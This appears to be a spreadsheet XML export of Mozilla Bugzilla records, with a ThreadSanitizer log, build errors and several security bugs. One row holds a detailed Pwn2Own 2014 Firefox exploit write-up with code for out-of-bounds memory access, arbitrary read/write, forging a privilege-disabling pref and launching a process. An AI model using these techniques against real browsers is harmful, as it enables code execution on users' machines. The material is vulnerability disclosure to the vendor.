[task 2022-03-23T12:46:44.953Z] 12:46:44     INFO - GECKO(2993) | ==================
[task 2022-03-23T12:46:44.954Z] 12:46:44     INFO - GECKO(2993) | WARNING: ThreadSanitizer: data race (pid=2993)
[task 2022-03-23T12:46:44.955Z] 12:46:44     INFO - GECKO(2993) |   Write of size 8 at 0x7b200021a320 by main thread (mutexes: write M226722785161565008, write M229819009905384160):
[task 2022-03-23T12:46:44.957Z] 12:46:44     INFO - GECKO(2993) |     #0 sftkdb_switchKeys /builds/worker/checkouts/gecko/security/nss/lib/softoken/sftkpwd.c:657:29 (libsoftokn3.so+0x50e3e)
[task 2022-03-23T12:46:44.959Z] 12:46:44     INFO - GECKO(2993) |     #1 sftkdb_finishPasswordCheck /builds/worker/checkouts/gecko/security/nss/lib/softoken/sftkpwd.c:1083:9 (libsoftokn3.so+0x50e3e)
[task 2022-03-23T12:46:44.959Z] 12:46:44     INFO - GECKO(2993) |     #2 sftkdb_CheckPassword /builds/worker/checkouts/gecko/security/nss/lib/softoken/sftkpwd.c:946:10 (libsoftokn3.so+0x51141)
[task 2022-03-23T12:46:44.963Z] 12:46:44     INFO - GECKO(2993) |     #3 sftkdb_ChangePassword /builds/worker/checkouts/gecko/security/nss/lib/softoken/sftkpwd.c:1377:14 (libsoftokn3.so+0x51aa6)
[task 2022-03-23T12:46:44.963Z] 12:46:44     INFO - GECKO(2993) |     #4 NSC_SetPIN /builds/worker/checkouts/gecko/security/nss/lib/softoken/pkcs11.c:4102:10 (libsoftokn3.so+0x1fee5)
[task 2022-03-23T12:46:44.963Z] 12:46:44     INFO - GECKO(2993) |     #5 PK11_ChangePW /builds/worker/checkouts/gecko/security/nss/lib/pk11wrap/pk11auth.c:514:11 (libnss3.so+0x6608e)
...
[task 2022-03-23T12:46:45.107Z] 12:46:45     INFO - GECKO(2993) |     #22 MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3 (libxul.so+0x198dfbc)
[task 2022-03-23T12:46:45.108Z] 12:46:45     INFO - GECKO(2993) |     #23 nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:389:10 (libxul.so+0xfbacdc)
[task 2022-03-23T12:46:45.108Z] 12:46:45     INFO - GECKO(2993) |     #24 _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5 (libnspr4.so+0x44fad)
[task 2022-03-23T12:46:45.109Z] 12:46:45     INFO - GECKO(2993) | SUMMARY: ThreadSanitizer: data race /builds/worker/checkouts/gecko/security/nss/lib/softoken/sftkpwd.c:657:29 in sftkdb_switchKeys
[task 2022-03-23T12:46:45.110Z] 12:46:45     INFO - GECKO(2993) | ==================
[task 2022-03-23T12:46:45.142Z] 12:46:45     INFO - GECKO(2993) | Exiting due to channel error.
[task 2022-03-23T12:46:45.142Z] 12:46:45     INFO - GECKO(2993) | Exiting due to channel error.
[task 2022-03-23T12:46:45.143Z] 12:46:45     INFO - GECKO(2993) | Exiting due to channel error.
[task 2022-03-23T12:46:45.143Z] 12:46:45     INFO - GECKO(2993) | Exiting due to channel error.
[task 2022-03-23T12:46:45.144Z] 12:46:45     INFO - GECKO(2993) | Exiting due to channel error.
[task 2022-03-23T12:46:45.144Z] 12:46:45     INFO - GECKO(2993) | Crash Annotation GraphicsCriticalError: |[C0][GFX1-]: Receive IPC close with reason=AbnormalShutdown (t=15.5342) Crash Annotation GraphicsCriticalError: |[C0][GFX1-]: Receive IPC close with reason=AbnormalShutdown (t=13.6667) Crash Annotation GraphicsCriticalError: |[C0][GFX1-]: Receive IPC close with reason=AbnormalShutdown (t=139.979) Exiting due to channel error.
[task 2022-03-23T12:46:45.145Z] 12:46:45     INFO - GECKO(2993) | Crash Annotation GraphicsCriticalError: |[C0][GFX1-]: Receive IPC close with reason=AbnormalShutdown (t=17.7682) Exiting due to channel error.
[task 2022-03-23T12:46:45.149Z] 12:46:45     INFO - GECKO(2993) | Exiting due to channel error.
[task 2022-03-23T12:46:46.191Z] 12:46:46     INFO - GECKO(2993) | Crash Annotation GraphicsCriticalError: |[C0][GFX1-]: Receive IPC close with reason=AbnormalShutdown (t=304.854)
[task 2022-03-23T12:46:46.192Z] 12:46:46     INFO - TEST-INFO | Main app process: killed by SIGIOT
[task 2022-03-23T12:46:46.193Z] 12:46:46     INFO - Buffered messages logged at 12:46:44
[task 2022-03-23T12:46:46.194Z] 12:46:46     INFO - Entering test bound policies_headjs_startWithCleanSlate
[task 2022-03-23T12:46:46.194Z] 12:46:46     INFO - TEST-PASS | browser/components/enterprisepolicies/tests/browser/browser_policy_masterpassword.js | Engine is inactive at the start of the test -
```</t>
        </is>
      </c>
      <c r="X4270" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4271">
      <c r="A4271" t="n">
        <v>659017</v>
      </c>
      <c r="B4271" t="inlineStr">
        <is>
          <t>2011-05-23 09:43:44 -0700</t>
        </is>
      </c>
      <c r="C4271" t="inlineStr">
        <is>
          <t>Add Webtrends Tracking for Mozillians.org</t>
        </is>
      </c>
      <c r="D4271" t="inlineStr">
        <is>
          <t>2012-04-19 20:32:00 -0700</t>
        </is>
      </c>
      <c r="E4271" t="n">
        <v>1</v>
      </c>
      <c r="F4271" t="n">
        <v>1</v>
      </c>
      <c r="G4271" t="n">
        <v>5</v>
      </c>
      <c r="H4271" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4271" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J4271" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K4271" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4271" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4271" t="inlineStr"/>
      <c r="Q4271" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4271" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4271" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4271" t="n">
        <v>1</v>
      </c>
      <c r="U4271" t="n">
        <v>0</v>
      </c>
      <c r="V4271" t="n">
        <v>13</v>
      </c>
      <c r="W4271" t="inlineStr">
        <is>
          <t>Add Webtrends Tracking code to this website per the instructions in:
https://intranet.mozilla.org/Webanalytics#Track_a_New_Domain</t>
        </is>
      </c>
      <c r="X4271" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4272">
      <c r="A4272" t="n">
        <v>693184</v>
      </c>
      <c r="B4272" t="inlineStr">
        <is>
          <t>2011-10-09 11:06:05 -0700</t>
        </is>
      </c>
      <c r="C4272" t="inlineStr">
        <is>
          <t>Please reimage talos-r3-w7-019</t>
        </is>
      </c>
      <c r="D4272" t="inlineStr">
        <is>
          <t>2013-07-16 09:48:45 -0700</t>
        </is>
      </c>
      <c r="E4272" t="n">
        <v>1</v>
      </c>
      <c r="F4272" t="n">
        <v>1</v>
      </c>
      <c r="G4272" t="n">
        <v>5</v>
      </c>
      <c r="H4272" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4272" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J4272" t="inlineStr">
        <is>
          <t>RelOps: General</t>
        </is>
      </c>
      <c r="K4272" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4272" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4272" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4272" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4272" t="inlineStr">
        <is>
          <t>[badslave]</t>
        </is>
      </c>
      <c r="Q4272" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4272" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4272" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4272" t="n">
        <v>1</v>
      </c>
      <c r="U4272" t="n">
        <v>0</v>
      </c>
      <c r="V4272" t="n">
        <v>7</v>
      </c>
      <c r="W4272" t="inlineStr">
        <is>
          <t>If you look at https://build.mozilla.org/buildapi/recent/talos-r3-w7-019/500 for "-tp" and "_tp" you'll see that talos-r3-w7-019 hasn't been able to successfully run a Talos tp job for at least the last 500 jobs, or since 2011-09-21 (I didn't go further back to see when it actually last succeeded).
The ones I've seen, https://tbpl.mozilla.org/php/getParsedLog.php?id=6743710&amp;tree=Mozilla-Inbound and https://tbpl.mozilla.org/php/getParsedLog.php?id=6754457&amp;tree=Mozilla-Aurora, were both "OSError: [Errno 13] Permission denied: 'c:\\users\\cltbld\\appdata\\local\\temp\\tmp{random}\\profile\\Cache\\_CACHE_001_'" so... whatever it copies into the random profile has busted perms?</t>
        </is>
      </c>
      <c r="X4272" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4273">
      <c r="A4273" t="n">
        <v>1425224</v>
      </c>
      <c r="B4273" t="inlineStr">
        <is>
          <t>2017-12-14 05:24:58 -0800</t>
        </is>
      </c>
      <c r="C4273" t="inlineStr">
        <is>
          <t>browser.devtools.panels.create does not ensure panel pagePath is relative URL</t>
        </is>
      </c>
      <c r="D4273" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:13 -0700</t>
        </is>
      </c>
      <c r="E4273" t="n">
        <v>1</v>
      </c>
      <c r="F4273" t="n">
        <v>1</v>
      </c>
      <c r="G4273" t="n">
        <v>3</v>
      </c>
      <c r="H4273" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4273" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J4273" t="inlineStr">
        <is>
          <t>Developer Tools</t>
        </is>
      </c>
      <c r="K4273" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L4273" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4273" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4273" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4273" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4273" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4273" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4273" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T4273" t="n">
        <v>1</v>
      </c>
      <c r="U4273" t="n">
        <v>0</v>
      </c>
      <c r="V4273" t="n">
        <v>27</v>
      </c>
      <c r="W4273" t="inlineStr">
        <is>
          <t>Created attachment 8936788
devtools-panels.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
PoC attached.
1. Unpack attached PoC addon
2. Go to about:debugging and temporarily load the unpacked addon
3. Open web console and navigate to 'My Panel'
Actual results:
We can load non-relative URLs including privileged about: urls
Expected results:
According to https://developer.mozilla.org/en-US/Add-ons/WebExtensions/API/devtools.panels/create 
"The URL should be relative to the manifest.json file itself"
Also, as per Bug 1380597 this is breaking security measures.</t>
        </is>
      </c>
      <c r="X4273" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4274">
      <c r="A4274" t="n">
        <v>191085</v>
      </c>
      <c r="B4274" t="inlineStr">
        <is>
          <t>2003-01-29 02:44:04 -0800</t>
        </is>
      </c>
      <c r="C4274" t="inlineStr">
        <is>
          <t>process_bug.cgi: FetchSQLData vs. FetchOneColumn and other oddness</t>
        </is>
      </c>
      <c r="D4274" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:35 -0800</t>
        </is>
      </c>
      <c r="E4274" t="n">
        <v>1</v>
      </c>
      <c r="F4274" t="n">
        <v>1</v>
      </c>
      <c r="G4274" t="n">
        <v>4</v>
      </c>
      <c r="H4274" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4274" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4274" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4274" t="inlineStr">
        <is>
          <t>2.17.3</t>
        </is>
      </c>
      <c r="L4274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4274" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4274" t="inlineStr"/>
      <c r="Q4274" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4274" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4274" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4274" t="n">
        <v>1</v>
      </c>
      <c r="U4274" t="n">
        <v>0</v>
      </c>
      <c r="V4274" t="n">
        <v>16</v>
      </c>
      <c r="W4274" t="inlineStr">
        <is>
          <t>I was told that one gets this in process_bug.cgi:
 You tried to change the product field from 1 to ZEDV, but only the owner or
 submitter of the bug, or a sufficiently empowered user, may change that
 field.
This seems to be fixed by:
--- process_bug.cgi     28 Nov 2002 10:49:41 -0000      1.172
+++ process_bug.cgi     29 Jan 2003 10:34:33 -0000
@@ -218,7 +218,7 @@
 if ( $::FORM{'id'} ) {
     SendSQL("SELECT name FROM products, bugs " .
             "WHERE products.id = bugs.product_id AND bug_id = $::FORM{'id'}");
-    $::oldproduct = FetchSQLData();
+    $::oldproduct = FetchOneColumn();
 }
Using my test accound (no extra rights at all): If I load a bug and do
absolutely no changes and hit "Submit" I get:
  Changes submitted for bug 42
  Email sent to: no one
  Excluding: (all others [my real account should get all)
This is still the case with this patch and might be related to bug 187861.
(One might change this for consistancy, but it is not needed:
@@ -775,7 +775,7 @@
 # to which the bug is restricted.
 if ( $::FORM{'id'} ) {
     SendSQL("SELECT group_id FROM bug_group_map WHERE bug_id = $::FORM{'id'}");
-    my ($havegroup) = FetchSQLData();
+    my $havegroup = FetchOneColumn();</t>
        </is>
      </c>
      <c r="X4274" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4275">
      <c r="A4275" t="n">
        <v>1538015</v>
      </c>
      <c r="B4275" t="inlineStr">
        <is>
          <t>2019-03-21 14:54:05 -0700</t>
        </is>
      </c>
      <c r="C4275" t="inlineStr">
        <is>
          <t>Revisit pref sync in to mitigate sandbox escape vector</t>
        </is>
      </c>
      <c r="D4275" t="inlineStr">
        <is>
          <t>2023-10-09 16:29:35 -0700</t>
        </is>
      </c>
      <c r="E4275" t="n">
        <v>1</v>
      </c>
      <c r="F4275" t="n">
        <v>1</v>
      </c>
      <c r="G4275" t="n">
        <v>2</v>
      </c>
      <c r="H4275" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4275" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4275" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K4275" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4275" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4275" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4275" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4275" t="inlineStr">
        <is>
          <t>[adv-main68-][adv-esr60.8-]</t>
        </is>
      </c>
      <c r="Q4275" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4275" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4275" t="inlineStr">
        <is>
          <t>Firefox 69</t>
        </is>
      </c>
      <c r="T4275" t="n">
        <v>1</v>
      </c>
      <c r="U4275" t="n">
        <v>0</v>
      </c>
      <c r="V4275" t="n">
        <v>49</v>
      </c>
      <c r="W4275" t="inlineStr">
        <is>
          <t>In light of bug 1538008 we should re-think the way we sync preferences. See bug 1538008 for more details.</t>
        </is>
      </c>
      <c r="X4275" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4276">
      <c r="A4276" t="n">
        <v>567827</v>
      </c>
      <c r="B4276" t="inlineStr">
        <is>
          <t>2010-05-24 12:42:03 -0700</t>
        </is>
      </c>
      <c r="C4276" t="inlineStr">
        <is>
          <t>maemo4 scratchbox on ix boxes dies on make buildsymbols (maemo4 host python)</t>
        </is>
      </c>
      <c r="D4276" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4276" t="n">
        <v>1</v>
      </c>
      <c r="F4276" t="n">
        <v>1</v>
      </c>
      <c r="G4276" t="n">
        <v>5</v>
      </c>
      <c r="H4276" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4276" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4276" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4276" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4276" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4276" t="inlineStr">
        <is>
          <t>Maemo</t>
        </is>
      </c>
      <c r="N4276" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4276" t="inlineStr"/>
      <c r="Q4276" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4276" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4276" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4276" t="n">
        <v>1</v>
      </c>
      <c r="U4276" t="n">
        <v>0</v>
      </c>
      <c r="V4276" t="n">
        <v>42</v>
      </c>
      <c r="W4276" t="inlineStr">
        <is>
          <t>/home/cltbld/build/maemo-trunk-nightly/mozilla-central/objdir/config/nsinstall
-D ./dist/crashreporter-symbols
/usr/bin/python2.5
/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py
\
      -c --vcs-info                                          \
      -s /home/cltbld/build/maemo-trunk-nightly/mozilla-central               \
      ./dist/host/bin/dump_syms                                               
\
      ./dist/crashreporter-symbols                                   \
      ./dist/bin &gt;                                        \
./dist/crashreporter-symbols/fennec-2.0a1pre-Linux-20100523014056-symbols.txt
Processing file: ./dist/bin/TestDNS
Unexpected error:  &lt;type 'exceptions.OSError'&gt;
Traceback (most recent call last):
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 784, in &lt;module&gt;
    main()
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 780, in main
    dumper.Process(arg)
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 466, in Process
    return self.ProcessDir(file_or_dir)
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 483, in ProcessDir
    if not self.ProcessFile(fullpath):
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 531, in ProcessFile
    (filename, rootname) = GetVCSFilename(filename, self.srcdirs)
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 365, in GetVCSFilename
    fileInfo = HGFileInfo(file, srcdir)
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 281, in __init__
    'parent', '--template={node|short}')
  File
"/home/cltbld/build/maemo-trunk-nightly/mozilla-central/toolkit/crashreporter/tools/symbolstore.py",
line 263, in read_output
    (stdout, _) = Popen(args=args, stdout=PIPE).communicate()
  File "/usr/lib/python2.5/subprocess.py", line 594, in __init__
    errread, errwrite)
  File "/usr/lib/python2.5/subprocess.py", line 1086, in _execute_child
    data = os.read(errpipe_read, 1048576) # Exceptions limited to 1 MB
OSError: [Errno 4] Interrupted system call
make: *** [buildsymbols] Error 1
qemu: uncaught target signal 1 (Hangup) - exiting
jhford -- how do we leverage the host-native python in maemo4 scratchbox land?</t>
        </is>
      </c>
      <c r="X4276" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4277">
      <c r="A4277" t="n">
        <v>982974</v>
      </c>
      <c r="B4277" t="inlineStr">
        <is>
          <t>2014-03-12 18:18:09 -0700</t>
        </is>
      </c>
      <c r="C4277" t="inlineStr">
        <is>
          <t>TypedArrayObject.cpp doesn't take into account that ArrayBuffers can be neutered (ZDI-CAN-2220)</t>
        </is>
      </c>
      <c r="D4277" t="inlineStr">
        <is>
          <t>2016-03-02 17:41:55 -0800</t>
        </is>
      </c>
      <c r="E4277" t="n">
        <v>1</v>
      </c>
      <c r="F4277" t="n">
        <v>1</v>
      </c>
      <c r="G4277" t="n">
        <v>3</v>
      </c>
      <c r="H4277" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4277" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4277" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4277" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4277" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4277" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4277" t="inlineStr">
        <is>
          <t>[pwn2own 2014][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q4277" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4277" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4277" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T4277" t="n">
        <v>1</v>
      </c>
      <c r="U4277" t="n">
        <v>0</v>
      </c>
      <c r="V4277" t="n">
        <v>120</v>
      </c>
      <c r="W4277" t="inlineStr">
        <is>
          <t>Pwn2Own 2014 Firefox exploit
By Jüri Aedla
The bug
Code in js/src/vm/TypedArrayObject.cpp doesn't take into account that ArrayBuffers
can be neutered. Neutering sets ArrayBuffer length to zero. Quite a few functions are probably
vulnerable, I tested TypedArrayObjectTemplate::fun_subarray_impl() and
DataViewObject::write().
fun_subarray_impl() does:
…
uint32_t length = tarray-&gt;length();
…
if (!ToClampedIndex(cx, args[1], length, &amp;end))
…
JSObject *nobj = createSubarray(cx, tarray, begin, end);
It stores the array length and then reads the value of args[1]. If args[1] is an object, its
valueOf() is called, so attacker gets control. Attacker can then neuter the array so its length
becomes zero. Now fun_subarray_impl() proceeds with an invalid length and creates a large
subarray of an empty array. The subarray is returned to the attacker, so he gets an OOB chunk which
he can read/write.
The OOB chunk lies in javascript heap. Normally large ArrayBuffer contents are allocated
externally. But as the ArrayBuffer is neutered, ArrayBufferObject::changeContents()
resets the elements pointer to fixedElements(), which points into the ArrayBuffer object
itself, allocated in JS heap. So the attacker can now read/write an OOB chunk in JS heap.
Exploit
The exploit consists of two components. Code under neuter/ achieves arbitrary read/write and leaks
a pointer to data section. It is wrapped in a RW module, which has functions ReadU8(), WriteU8()
and LeakPtr(). Second part of the code under libexp/ takes the RW module and executes calc. It
is reusable.
Arbitrary read/write
The exploit escalates the read/write of JS heap chunk into arbitrary read/write by taking control over a
Uint8Array. Uint8Array is a nice target because one of its slots is pointer to data. By overwriting
this pointer we can read/write arbitrary locations.
So the expoit creates a neuterable ArrayBuffer:
this.unused.push(this.audio_context.createBuffer(1, conf.oob_size_u32, 96000));
…
this.audio_buffer = this.unused.pop()
Then it creates 500000 Uint8Arrays:
for (var i = 0; i &lt; conf.num_views; i++)
this.views.push(new Uint8Array(this.buffer_for_views, conf.magic_offset,
conf.magic_length));
The magic_offset is 20 random bits which make it easy to search for the views from the OOB
block. Now we create a subarray of an Uint32Array which wraps a neuterable ArrayBuffer:
var view_f32 = this.audio_buffer.getChannelData(0);
var array_buffer = view_f32.buffer;
var view_u32_tmp = new Uint32Array(array_buffer);
this.oob = view_u32_tmp.subarray(0, end);
The end is an object whose valueOf() neuters the ArrayBuffer:
var convolver = this.audio_context.createConvolver();
convolver.buffer = this.audio_buffer;
So OOB memory block can now be accessed via this.oob. Let's search for any Uint8Array:
for (var i = 0; i &lt; this.oob.length; i++) {
if (this.oob[i + this.ByteOffsetSlot] == this.conf.magic_offset &amp;&amp;
this.oob[i + this.ByteLengthSlot] == this.conf.magic_length) {
break;
Then determine which one we found:
this.oob[this.SlotOffset(this.ByteOffsetSlot)]--;
for (var i = 0; i &lt; this.views.length; i++) {
if (this.views[i].byteOffset == this.conf.magic_offset - 1) {
break;
We can now overwrite the data pointer of found Uint8Array. Let's implement ReadU8():
this.SetAddress(address);
return this.rw_view[0];
SetAddress() overwrites the data pointer:
this.WritePointerSlot(this.DataSlot, address);
which does:
var offset = this.SlotOffset(slot);
this.oob[offset] = pointer.Low();
if (platform.Is64BitBrowser())
this.oob[offset + 1] = pointer.High();
WriteU8() is similar. Now to break ASLR. We basically read Uint8Array-&gt;type_-&gt;clasp,
which points into static TypedArrayObject::classes[]. The classes array lies in the
data section of mozjs.dll, so we find where mozjs.dll is:
var type_address = this.ReadPointerSlot(this.TypeSlot);
var type = new Variable(this, type_address, this.type_object_type);
this.leaked_ptr = type.clasp.Read();
The RW module is now complete.
Btw, the Variable above is a helper object that can read/write different integer types, pointers, struct
fields. The first argument to Variable is the RW module, second is the variable address, third is
variable type. The type_object_type is defined as:
this.type_object_type = {
kind: 'struct',
fields: {
clasp: {offset: 0, type: Variable.Pointer},
},
}
So we're declaring a struct with clasp pointer field at offset 0.
Getting Components
Now to escalate arbitrary read/write into privileged javascript. For that the exploit creates the
"security.turn_off_all_security_so_that_viruses_can_take_over_this_co
mputer" pref entry. Once we have this entry, new iframes will have
netscape.security.PrivilegeManager attached. Once we have that, we can get the
Components object:
netscape.security.PrivilegeManager.enablePrivilege();
This gives us the privileged Components object, which enables us to access the filesystem and
launch processes.
Here's the code creates the pref entry:
var key =
'security.turn_off_all_security_so_that_viruses_can_take_over_this_computer';
var hash = 0x3da5e8d3;
var key_string = this.memory.AllocateString(key).address;
var hash_table = this.memory.GetVariable('xul!gHashTable', this.hash_table_type);
var hash_shift = hash_table.hash_shift.ReadJsNum();
var entry_index = U32Shr(hash, hash_shift);
var entry = hash_table.entry_store.DerefAt(entry_index);
entry.key_hash.WriteJsNum(hash);
entry.key.Write(key_string);
entry.user_pref.WriteJsNum(1);
entry.flags.WriteJsNum(0x0082);
return entry;
So we calculate the entry_index and fill out key_hash, key, user_pref and flags of the
entry.
Executing calc
Once we have the privileged Components, we execute calc:
var file = this.CreateClass('file/local', 'nsIFile');
var stream = this.CreateClass('network/file-output-stream',
'nsIFileOutputStream');
var process = this.CreateClass('process/util', 'nsIProcess');
var command = this.GetCommand();
file.initWithPath(this.GetShellScriptPath());
stream.init(file, this.Wronly | this.CreateFile | this.Truncate, 0755, 0);
stream.write(command, command.length);
stream.close();
process.init(file);
process.run(true, [], 0);
file.remove(false);
where command == 'start calc' and GetShellScriptPath() creates a temporary path
for a .bat file. So we create a .bat file, write 'start calc' inside and launch it.</t>
        </is>
      </c>
      <c r="X4277" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4278">
      <c r="A4278" t="n">
        <v>1209471</v>
      </c>
      <c r="B4278" t="inlineStr">
        <is>
          <t>2015-09-29 04:39:49 -0700</t>
        </is>
      </c>
      <c r="C4278" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned object with unexpected type, at js/src/jit/MacroAssembler.cpp:1531</t>
        </is>
      </c>
      <c r="D4278" t="inlineStr">
        <is>
          <t>2016-07-02 11:28:56 -0700</t>
        </is>
      </c>
      <c r="E4278" t="n">
        <v>1</v>
      </c>
      <c r="F4278" t="n">
        <v>1</v>
      </c>
      <c r="G4278" t="n">
        <v>3</v>
      </c>
      <c r="H4278" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4278" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4278" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4278" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4278" t="inlineStr">
        <is>
